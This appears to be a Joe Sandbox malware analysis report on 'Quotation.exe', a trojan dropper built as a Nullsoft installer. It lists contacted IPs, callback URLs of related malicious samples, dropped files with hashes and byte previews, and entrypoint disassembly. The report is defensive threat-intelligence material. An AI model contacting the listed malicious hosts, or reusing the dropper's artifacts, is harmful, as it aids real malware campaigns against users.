                                    http://www.fontbureau.com/designersexplorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpfalse
                                      		high
                                      http://www.goodfont.co.krexplorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.namebrightstatic.com/images/logo_off.gif)netsh.exe, 00000008.00000002.501631169.0000000003E7F000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.carterandcone.comlexplorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.sajatypeworks.comexplorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.typography.netDexplorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpfalse
                                        		high
                                        http://www.founder.com.cn/cn/cTheexplorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://fontfabrik.comexplorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.founder.com.cn/cnexplorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpfalse
                                          		high
                                          http://www.jiyu-kobo.co.jp/explorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.fontbureau.com/designers8explorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpfalse
                                            		high
                                            http://www.fonts.comexplorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpfalse
                                              		high
                                              http://www.sandoll.co.krexplorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.urwpp.deDPleaseexplorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.zhongyicts.com.cnexplorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.sakkal.comexplorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown

                                              Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public

                                              IPDomainCountryFlagASNASN NameMalicious
                                              162.241.24.122
                                              		riceandginger.comUnited States
                                              		46606UNIFIEDLAYER-AS-1UStrue
                                              34.102.136.180
                                              		houseof2.comUnited States
                                              		15169GOOGLEUSfalse
                                              156.235.228.19
                                              		www.xyfs360.comSeychelles
                                              		134548DXTL-HKDXTLTseungKwanOServiceHKtrue
                                              198.54.117.216
                                              		parkingpage.namecheap.comUnited States
                                              		22612NAMECHEAP-NETUSfalse

                                              General Information

                                              Joe Sandbox Version:31.0.0 Emerald
                                              Analysis ID:383984
                                              Start date:08.04.2021
                                              Start time:13:34:52
                                              Joe Sandbox Product:CloudBasic
                                              Overall analysis duration:0h 9m 16s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Sample file name:Quotation.exe
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                              Number of analysed new started processes analysed:27
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:1
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • HDC enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Detection:MAL
                                              Classification:mal100.troj.evad.winEXE@7/3@4/4
                                              EGA Information:Failed
                                              HDC Information:
                                              • Successful, ratio: 20.9% (good quality ratio 18.6%)
                                              • Quality average: 72.9%
                                              • Quality standard deviation: 32.3%
                                              HCA Information:
                                              • Successful, ratio: 91%
                                              • Number of executed functions: 79
                                              • Number of non-executed functions: 65
                                              Cookbook Comments:
                                              • Adjust boot time
                                              • Enable AMSI
                                              • Found application associated with file extension: .exe
                                              Warnings:
                                              Show All
                                              • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                              • Excluded IPs from analysis (whitelisted): 104.42.151.234, 104.43.139.144, 23.54.113.53, 168.61.161.212, 95.100.54.203, 20.82.210.154, 23.10.249.43, 23.10.249.26, 20.54.26.129, 20.50.102.62
                                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, arc.msn.com.nsatc.net, ris-prod.trafficmanager.net, store-images.s-microsoft.com-c.edgekey.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, skypedataprdcolwus16.cloudapp.net
                                              • VT rate limit hit for: /opt/package/joesandbox/database/analysis/383984/sample/Quotation.exe

                                              Simulations

                                              Behavior and APIs

                                              No simulations

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              162.241.24.122PO.exeGet hashmaliciousBrowse
                                              • www.riceandginger.com/fcn/?8p4=IIapObjlcsmN/tTUXuiVJ6SvcAdYVsMSy0eMvzJ/vGgposGY5YkWehqMwppvssjWa3vK&sZCp=0btLwJX8eFdTeVr
                                              TRANSFER CONFIRMATION_PDF.exeGet hashmaliciousBrowse
                                              • www.riceandginger.com/fcn/?nR-lCh=-ZkPgF4h0LuP&Bj4=IIapObjlcsmN/tTUXuiVJ6SvcAdYVsMSy0eMvzJ/vGgposGY5YkWehqMwqJ/jNzuESGN
                                              198.54.117.216DYANAMIC Inquiry.xlsxGet hashmaliciousBrowse
                                              • www.boogerstv.com/p2io/?pJE8=G0GpifmhvxtXlZL&-ZoXL=fW2NkW2m2880y7g2f/m+egXTc5dWq8qtohIQX9xRv3Snfsyr1ZmLXRti4FdN58+iKIl8Sw==
                                              ALPHA SCIENCE, INC.exeGet hashmaliciousBrowse
                                              • www.911salesrescue.com/sqra/?Rl=pq8KHaLgBYlMb7GR3VJ/cL4dF9VTs2jS1VGjWDfBvu/RR65b3/eoUhDFCE5vmyzJV1nh&_jqT2L=gBg8BF3ptlc
                                              1517679127365.exeGet hashmaliciousBrowse
                                              • www.swavhca.com/ct6a/?YP=fbdhu8lXTJZTH&LhN0T=t85XbN3qNlbTw/JaLNJ7F4/+On2opPlRNjQpYLfn5nRJIrt0zCXnGg8yVYHQwlCaZVdo
                                              TSPO0001978-xlxs.exeGet hashmaliciousBrowse
                                              • www.switcheo.finance/uwec/?-ZVd=1bgta&T8VxaVs=3cOH6CffnF8zA2vO0DHvKlrvSwO+w2vUbH/s+qgAJjYXXQ/ohIL0shsdTQ14Zv3dTuQV
                                              igPVY6UByI.exeGet hashmaliciousBrowse
                                              • www.dbdcontractlngllc.com/evpn/?6lB4ir3X=HFShCSWXwaKkW2ZiFlcUlPO3+HJMVrrKG3pif6jrFe/K9RUAGcpqC/YV0bjZ8afR2I7A&lZQ=fxoxjP38
                                              order samples 056-062 _pdf.exeGet hashmaliciousBrowse
                                              • www.gattisicecream.com/nu8e/?7ntLT=H0OBJMmEUgvZcgBddvaavx+e86Q1Ewqz/q4u2TIdbw6nMChu3R+Cq7j/in+DO7Gj50PD&v4Xpf=oBZl2rip
                                              P.O71540.xlsxGet hashmaliciousBrowse
                                              • www.toplevelsealcoating.net/njo/?jpal0=mxuHlFV+ZuSguIs2Jcwsp6DcsuxeedOYcK/5rsXgvOQsfT3joYJg2D4C6z0Ci+7Qc2CgOg==&3ft=fxotnVnH_pxPJD2P
                                              Purchase Order _pdf.exeGet hashmaliciousBrowse
                                              • www.doorman.pro/bft/?s8eTn6p=cPB7zr1p3SmwgzYXiBUkF9mwqufO0UDDdPUnBBhQn+hhkWASV2AK1gVN757rEFaij0Eh&2d=lnxh
                                              PO#4503527426.xlsxGet hashmaliciousBrowse
                                              • www.oodi.club/j5an/?3f=dOaW3vahSXqg4+CHM7A8brpc4JT3ik1DQ14U6alOEgrJbBQuvLIVfIvFsL19wjAmshOCtA==&SH=u2M0w8Cp
                                              SOA 2.docGet hashmaliciousBrowse
                                              • www.inifinityapps.net/bf3/?pBR=swuzFfg2YELF3Ru0riS9eAlbkrlhpvPYJEoO3kAfMfwngIUjKqHF470zbQhO/y10VYkWvA==&ON6h=lFQLUjPpddS8R0S0
                                              imTmqTngvS.exeGet hashmaliciousBrowse
                                              • www.techinvestor.net/tmz/?qFQhSfAp=K3BD3qDI+aee8DpmSbQXpbOTPwLovYyqciBQO+B1r1efJTEAnqucMp36KUkTt76iGrJvJTWHKg==&8p=fdiLulhXj
                                              winlog(1).exeGet hashmaliciousBrowse
                                              • www.304shaughnessygreen.info/oean/?u4XpH=d8/ljYFfl/PIYPjWsWUnApMkbVV7hvzPIdCz8jHXy+5qO30gF7f5xBZ16m2K4v/YBLhmp8B+9w==&8pNhXv=yVML0zB0
                                              Request for Quotation.exeGet hashmaliciousBrowse
                                              • www.kingdomwinecommunity.com/9t6k/?wR=AqHI0+MX2ftrVe3DEiYBNVYhM67Z+qKer8sV+OvuybcJEoEJXTUx/oN34534+xty7Jcn&S0Gll=RRHTxr6PgzuH1
                                              in.exeGet hashmaliciousBrowse
                                              • www.concur.design/uds2/?Y4spQFW=n2X6clJmCA05S3ZeqrcWmU9LgTYh3Xo9IMSlcPg8h+SS+WcZ+1zi1nXkqGc0mRUifak24jBbuw==&Ezu=VTChCL_ht2spUrI
                                              0XrD9TsGUr.exeGet hashmaliciousBrowse
                                              • www.madbaddie.com/csv8/?RRm=bmU6bhxvgrtQDLdFrXfZu84+YLpNz+FpUYa4sbpu+DXpESkC+J6KAuS4IExlqjj6N4cMeGxZJA==&rV0DPf=8pMPQ6
                                              kqwqyoFz1C.exeGet hashmaliciousBrowse
                                              • www.pnorg.net/jskg/?9roHn=FFllKUI2Vy3AcuNhWrh4fKbis3luBqLkf2wubdQ4CJ+GPQXPDvWWudAI4bM3GwbQsdH4&npHhW=3fq4gDD0abs8
                                              jEgLNI40Ro9O775.exeGet hashmaliciousBrowse
                                              • www.nautilus.photos/e66m/?Qzu=/jbGnlKlCl+kfGg+6TwKlRO8yGA+aFIV4OcnMw7A2/lyvNgUFCY9EZaTm252tDySX7Bu&tZUX=QtxX3N6pmn8HFjP
                                              hlNvQKaRR3.exeGet hashmaliciousBrowse
                                              • www.freshlookconsulting.net/jskg/?yN6Ddr1H=7pn97mLWvkMXGDEchdpcgW9NAJQehO/Pf6j+f8BObvafep31f10mg4FYeAaWQcAcoJTm&8p=2dOPB6nHz
                                              hO3eV0L7FB.exeGet hashmaliciousBrowse
                                              • www.accessible.legal/csv8/?lh28=O0GliFfpjJXxzb&LXe09=oGqbtMom9WGYi+RBhVD/q4yy78sx6VM5qFnCf+91Xqn8W7yN0ac+rgSlx9DJFvjgpGDVDlUe9g==
                                              U0N4EBAJKJ.exeGet hashmaliciousBrowse
                                              • www.madbaddie.com/csv8/?Rh=8pgDCRypynATXZ&cj=bmU6bhxvgrtQDLdFrXfZu84+YLpNz+FpUYa4sbpu+DXpESkC+J6KAuS4IHd12S/BKN1d

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              parkingpage.namecheap.comPO-RFQ # 097663899.exeGet hashmaliciousBrowse
                                              • 198.54.117.218
                                              Betaling_advies.exeGet hashmaliciousBrowse
                                              • 198.54.117.218
                                              gqnTRCdv5u.exeGet hashmaliciousBrowse
                                              • 198.54.117.211
                                              eQLPRPErea.exeGet hashmaliciousBrowse
                                              • 198.54.117.215
                                              PaymentAdvice.exeGet hashmaliciousBrowse
                                              • 198.54.117.218
                                              DYANAMIC Inquiry.xlsxGet hashmaliciousBrowse
                                              • 198.54.117.216
                                              Quotation Zhejiang.xlsxGet hashmaliciousBrowse
                                              • 198.54.117.215
                                              TACA20210407.PDF.exeGet hashmaliciousBrowse
                                              • 198.54.117.212
                                              46578-TR.exeGet hashmaliciousBrowse
                                              • 198.54.117.218
                                              ALPHA SCIENCE, INC.exeGet hashmaliciousBrowse
                                              • 198.54.117.216
                                              SALINAN SWIFT PRA-PEMBAYARAN UNTUK PEMASANGAN.exeGet hashmaliciousBrowse
                                              • 198.54.117.217
                                              1517679127365.exeGet hashmaliciousBrowse
                                              • 198.54.117.216
                                              BL-2010403L.exeGet hashmaliciousBrowse
                                              • 198.54.117.218
                                              Shinshin Machinery.exe.exeGet hashmaliciousBrowse
                                              • 198.54.117.212
                                              PDF NEW P.OJerhWEMSj4RnE4Z.exeGet hashmaliciousBrowse
                                              • 198.54.117.217
                                              INV-210318L.exeGet hashmaliciousBrowse
                                              • 198.54.117.212
                                              Inquiry.docxGet hashmaliciousBrowse
                                              • 198.54.117.218
                                              BL Draft copy.exeGet hashmaliciousBrowse
                                              • 198.54.117.215
                                              Order.exeGet hashmaliciousBrowse
                                              • 198.54.117.210
                                              PO.1183.exeGet hashmaliciousBrowse
                                              • 198.54.117.211

                                              ASN

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              NAMECHEAP-NETUSPO-RFQ # 097663899.exeGet hashmaliciousBrowse
                                              • 198.54.117.218
                                              Betaling_advies.exeGet hashmaliciousBrowse
                                              • 198.54.117.218
                                              nova narud#U017eba pdf rvP6N.exeGet hashmaliciousBrowse
                                              • 63.250.37.200
                                              gqnTRCdv5u.exeGet hashmaliciousBrowse
                                              • 198.54.117.211
                                              Calt7BoW2a.exeGet hashmaliciousBrowse
                                              • 63.250.43.5
                                              eQLPRPErea.exeGet hashmaliciousBrowse
                                              • 198.54.117.215
                                              vbc.exeGet hashmaliciousBrowse
                                              • 198.54.117.244
                                              000OUTQ080519103.pdf.exeGet hashmaliciousBrowse
                                              • 198.54.126.159
                                              PaymentAdvice.exeGet hashmaliciousBrowse
                                              • 198.54.117.218
                                              DYANAMIC Inquiry.xlsxGet hashmaliciousBrowse
                                              • 198.54.117.216
                                              Quotation Zhejiang.xlsxGet hashmaliciousBrowse
                                              • 198.54.117.215
                                              quotation.exeGet hashmaliciousBrowse
                                              • 162.0.229.227
                                              PU Request Form Hardware.exeGet hashmaliciousBrowse
                                              • 198.54.126.165
                                              URGENT INQUIRY.exeGet hashmaliciousBrowse
                                              • 198.54.126.165
                                              8e29685862fc0d569411c311852d3bb2da2eedb25fc9085a95020b17ddc073a9.xlsGet hashmaliciousBrowse
                                              • 63.250.38.60
                                              8e29685862fc0d569411c311852d3bb2da2eedb25fc9085a95020b17ddc073a9.xlsGet hashmaliciousBrowse
                                              • 63.250.38.60
                                              8e29685862fc0d569411c311852d3bb2da2eedb25fc9085a95020b17ddc073a9.xlsGet hashmaliciousBrowse
                                              • 63.250.38.60
                                              Protected Client.jsGet hashmaliciousBrowse
                                              • 199.192.24.250
                                              one new parcel.exeGet hashmaliciousBrowse
                                              • 199.193.7.228
                                              Protected Client.jsGet hashmaliciousBrowse
                                              • 199.192.24.250
                                              DXTL-HKDXTLTseungKwanOServiceHKnova narud#U017eba pdf rvP6N.exeGet hashmaliciousBrowse
                                              • 156.235.148.136
                                              AQJEKNHnWK.exeGet hashmaliciousBrowse
                                              • 103.97.19.74
                                              vbc.exeGet hashmaliciousBrowse
                                              • 154.86.211.231
                                              PaymentAdvice.exeGet hashmaliciousBrowse
                                              • 154.219.109.119
                                              BL01345678053567.exeGet hashmaliciousBrowse
                                              • 45.192.251.55
                                              pvUopSIi7C5Eklw.exeGet hashmaliciousBrowse
                                              • 156.245.147.6
                                              payment.exeGet hashmaliciousBrowse
                                              • 154.219.105.199
                                              New Order.exeGet hashmaliciousBrowse
                                              • 45.199.49.95
                                              BL84995005038483.exeGet hashmaliciousBrowse
                                              • 45.192.251.55
                                              SAKKAB QUOTATION_REQUEST.exeGet hashmaliciousBrowse
                                              • 154.86.211.135
                                              SwiftMT103_pdf.exeGet hashmaliciousBrowse
                                              • 154.84.125.40
                                              1517679127365.exeGet hashmaliciousBrowse
                                              • 154.219.193.141
                                              SB210330034.pdf.exeGet hashmaliciousBrowse
                                              • 154.81.99.74
                                              Purchase Orders.exeGet hashmaliciousBrowse
                                              • 45.192.251.43
                                              QUOTATION REQUEST.exeGet hashmaliciousBrowse
                                              • 156.239.96.43
                                              Request an Estimate_2021_04_01.exeGet hashmaliciousBrowse
                                              • 45.194.211.92
                                              proforma.exeGet hashmaliciousBrowse
                                              • 154.219.105.199
                                              xpy9BhQR3t.xlsxGet hashmaliciousBrowse
                                              • 154.80.163.105
                                              oQJT5eueEX.exeGet hashmaliciousBrowse
                                              • 154.214.73.24
                                              MACHINE SPECIFICATION.exeGet hashmaliciousBrowse
                                              • 156.232.242.149
                                              UNIFIEDLAYER-AS-1USRFQ_AP65425652_032421 isu-isu,pdf.exeGet hashmaliciousBrowse
                                              • 162.241.244.61
                                              PaymentAdvice.exeGet hashmaliciousBrowse
                                              • 108.167.140.96
                                              PRODUCT_INQUIRY_PO_0009044_PDF.exeGet hashmaliciousBrowse
                                              • 192.185.164.148
                                              PO.exeGet hashmaliciousBrowse
                                              • 162.241.24.122
                                              0BAdCQQVtP.exeGet hashmaliciousBrowse
                                              • 74.220.199.6
                                              TazxfJHRhq.exeGet hashmaliciousBrowse
                                              • 192.185.48.194
                                              vbc.exeGet hashmaliciousBrowse
                                              • 50.87.195.61
                                              PRICE_QUOTATION_RFQ_000988_PDF.exeGet hashmaliciousBrowse
                                              • 192.185.164.148
                                              PaymentAdvice.exeGet hashmaliciousBrowse
                                              • 198.57.149.44
                                              PRC-20-518 ORIGINAL.xlsxGet hashmaliciousBrowse
                                              • 162.241.61.249
                                              Aveo 742.htmlGet hashmaliciousBrowse
                                              • 162.241.124.93
                                              Bridgestone 363.htmlGet hashmaliciousBrowse
                                              • 162.241.124.93
                                              nunu.exeGet hashmaliciousBrowse
                                              • 192.185.162.134
                                              GS_ PO NO.1862021.exeGet hashmaliciousBrowse
                                              • 192.185.90.36
                                              Payment Report.htmlGet hashmaliciousBrowse
                                              • 192.185.195.15
                                              receipt-xxxx.htmGet hashmaliciousBrowse
                                              • 162.241.124.32
                                              Order-027165.exeGet hashmaliciousBrowse
                                              • 192.232.218.185
                                              Ewkoo9igCN.dllGet hashmaliciousBrowse
                                              • 162.241.54.59
                                              49Bvnq7iFK.dllGet hashmaliciousBrowse
                                              • 162.241.54.59
                                              OtOXfybCmW.dllGet hashmaliciousBrowse
                                              • 162.241.54.59

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Temp\6g13vjbdoi2ehkg8yw6
                                              Process:C:\Users\user\Desktop\Quotation.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):185856
                                              Entropy (8bit):7.999056053420569
                                              Encrypted:true
                                              SSDEEP:3072:iNQRASwtGpaYuz7czLmKdkKAl0L+pDuYFjQEniZ1mNsQwC6j/CD99J7K5ZGsaNYm:iRdtGpaYuASMk6+tuYqZ12sQP/9K5ZG9
                                              MD5:F96E5B318FD7258CB56A79C4C84324F4
                                              SHA1:4B724664C48D73F2A7FA125805E0538FAFB8462E
                                              SHA-256:BFF10860E3F16A093F8CD094E04664F815C12CD49561AB87A88EAA2498B38251
                                              SHA-512:40FBA8DFEDDECC528D096ED0E0BD501F77B52F10674E0335F5C70CBCD94E9D107CFF5F028D1E1821C3AE20DFA4A00554433EA5B6BE18D755DD7F522AC659700F
                                              Malicious:false
                                              Reputation:low
                                              Preview: .-...D...$5K....TiY.w9...jJ./.kPd.V.....{.S..s).........X.C....V5...fB.n2..>.-.7..f..hm3</#.........081..=.=.........CM....P..t.l...4..c.Z.e...2...{P..SQ.#P..f..Xr..V......p-H...<.z.!.!.......0.........Gm..f....f..].R.......*.(v......s$s.x..z.v..4.....xL2.;\Y(..Bc... ./.A.h._}.Q...g..+E....:..z....5..\.).m..&. ....!..nN...X.......9..j...^.....y...w.vH....X@.*.j.. .#x..T%.8.....+..0.#x...n..8..o<.."..#5PL3....C.\...s....L7Y.V.....k...y.S.....t.s..v5..Wv..'......]..5...&u...h&[..:k.......U..>..t.6V0...TU.n....=......YE^..^..........M.I.....:.....G....Sy^..].Z$.,.......F..%.n..)t.../..r..).J7lz...@..4.~$?D.>$..I.....k.........^..6...M.n.K.'J....}qo<.k>.aSZ.aU.......{z.....*...YH.......,......7X..$....Vi....f...7J.eOg..@..0t_..9]m.l.y..0L..q.tF.&.......M.S*._.qt...B.n..j....V.....>.q;]..wYr....Akg .....m.....?l...)..S.B.?y)..,$Q.i...G..........C3J(..~.....u...pf.+.+../_..A.Q.w.|..K.m.9K..N.zH...+.PB...8`a.J....?.4.N....`5...i.f.@....y....
                                              C:\Users\user\AppData\Local\Temp\nsu4E63.tmp\laegtoh4.dll
                                              Process:C:\Users\user\Desktop\Quotation.exe
                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):5120
                                              Entropy (8bit):4.158236328405185
                                              Encrypted:false
                                              SSDEEP:48:StXhoVLATc3cFa6PTh7SKFt5ET9TbOGa4zzBvoAXAdUMQ9Bg6RuqSqHSnM:nVLATc3z6BD5EhTiGXHBgVueaxBHSM
                                              MD5:F68CD7EF81A40B6DC714658AEF692640
                                              SHA1:377095C12352BEA1CE2AA195F4354270F8571767
                                              SHA-256:B0511BD682E5D539F05BE2C97D5E8E23DDDC48CC32AAA6C25B6A6ECEA4DEE475
                                              SHA-512:4C412EB6C9B01FFE57B582373703864448DB10B86D69A8B5AB9F2933917E6FD9FCD6124FF17A6A605A1C6D6569EA22DF1B80877BEF61B43F8D59B248D8791083
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 13%
                                              Reputation:low
                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;T..hT..hT..h@..iG..hT..h{..h...iU..h...iU..h...hU..h...iU..hRichT..h................PE..L...'.n`...........!......................... ...............................`............@......................... !..P...\".......@.......................P..p....!............................................... ...............................text............................... ..`.rdata..,.... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc..p....P......................@..B................................................................................................................................................................................................................................................................................................................................................
                                              C:\Users\user\AppData\Local\Temp\tqph8ojuftde3
                                              Process:C:\Users\user\Desktop\Quotation.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):6661
                                              Entropy (8bit):7.973833328167563
                                              Encrypted:false
                                              SSDEEP:192:f9GMw7lP6AfdFoGNxCDNNFFJ9HhXr0kfZV4kKHHlkHirmU:fMxp6Afd6CCDFxBfLKHHOU
                                              MD5:C786E7452E59B23515152DAA0BA0F81C
                                              SHA1:9EB1075E3830E9021352E246668B47E6965483F9
                                              SHA-256:605A0E21D422DC245CBE890D7E714961C32A2D657DDDFA3B76282051431578FA
                                              SHA-512:D20482CB2EA748BC4D105E9FA93E2F104477CC37EE2674336DB78AF9427565BA6AFA5BD305B993964F641EEA92E9F95EE5A1A30F8E7AD4230B08081938F65277
                                              Malicious:false
                                              Reputation:low
                                              Preview: .....D..EzO.y<.tQ!.G.[... x-.$ni.af.q.j..H..]...@;...N...CBF#k.......g'&%....>........,.G..i.......QPG......onm......ut{........q.......YXO... ..WVU....)c..#.W.../G..9.`..B.sA@7.....C....!B!.FQ.....3.8TW......?.^....T:@EqTdE~-R.].z{FW.6.WyG`.?.h`\q.H.azaV.Q.^ZJs.Rj.B3t.[y|.8}i,|M.u......n.[nV.A.xR1..&....../#.....CB1...:=..................]\c......KJy........w........~}......edk.......SRa.....)(.....0+....Pr..2..-,.IC...(.4:..PG........<.Y...i.......=$'e(.S.,I..`......u8tc....p........|...d..!..m.......eQ...M~;/z.R...7*).."...:Y....'......L..**.U.>.72|X..<.+*.....|...7.`c).$...c.XG..ps...xon.9..C..qh.........*s.....d.1._.i..!.p`WV.Pm"...%............8/.....6E..J.C...........w;7y.!.....Yo2.g..m'?e(..U.e_&.o.....9.;6.;.`...L...=.x..{.{P...Q6t.-D".$.... ..f...g[.T....8.11.Z......".....<..~.3..I.x..SSRQ;.....v.! ..`.b.`..e.k.i.G.....LPon.l....w.@.h.~}E..mqp.u....|kON.L.aa..VUT.a...Y...\....s..3.2.-.z..@..5.:..I.7...?6....|.%.b..Wl.,nu.f..?.Y..V....

                                              Static File Info

                                              General

                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                              Entropy (8bit):7.919658800710345
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 92.16%
                                              • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:Quotation.exe
                                              File size:228099
                                              MD5:1f86caaa19912ceb55c9f6121eb692bb
                                              SHA1:2d4dd95fdb17937b22a3d6a41862704ed80acf70
                                              SHA256:8309d803c92faaf24828cd67e4c1041f9465ecf6c63f7608d7ed4579f075a02c
                                              SHA512:720c68b543c3d5eb2d026feb0ae46d0c77aa0eb71cd3302c520384cbff27e28fed1f9f0b3c761aed7bdea054fd2d3829f294f3250175d6d159d1167122f67a72
                                              SSDEEP:6144:NDIjkRdtGpaYuASMk6+tuYqZ12sQP/9K5ZGsaNY2TuZzHS:0knquAS/NN/9OXKY2TezHS
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........lJ...$...$...$./.{...$...%.9.$.".y...$.......$.f."...$.Rich..$.........................PE..L.....8E.................\.........

                                              File Icon

                                              Icon Hash:b2a88c96b2ca6a72

                                              Static PE Info

                                              General

                                              Entrypoint:0x403166
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                              DLL Characteristics:
                                              Time Stamp:0x4538CD1D [Fri Oct 20 13:20:29 2006 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:18bc6fa81e19f21156316b1ae696ed6b

                                              Entrypoint Preview

                                              Instruction
                                              sub esp, 0000017Ch
                                              push ebx
                                              push ebp
                                              push esi
                                              xor esi, esi
                                              push edi
                                              mov dword ptr [esp+18h], esi
                                              mov ebp, 00409240h
                                              mov byte ptr [esp+10h], 00000020h
                                              call dword ptr [00407030h]
                                              push esi
                                              call dword ptr [00407270h]
                                              mov dword ptr [0042F4D0h], eax
                                              push esi
                                              lea eax, dword ptr [esp+30h]
                                              push 00000160h
                                              push eax
                                              push esi
                                              push 00429860h
                                              call dword ptr [00407158h]
                                              push 00409230h
                                              push 0042EC20h
                                              call 00007F6D64B7E938h
                                              mov ebx, 00436400h
                                              push ebx
                                              push 00000400h
                                              call dword ptr [004070B4h]
                                              call 00007F6D64B7C079h
                                              test eax, eax
                                              jne 00007F6D64B7C136h
                                              push 000003FBh
                                              push ebx
                                              call dword ptr [004070B0h]
                                              push 00409228h
                                              push ebx
                                              call 00007F6D64B7E923h
                                              call 00007F6D64B7C059h
                                              test eax, eax
                                              je 00007F6D64B7C252h
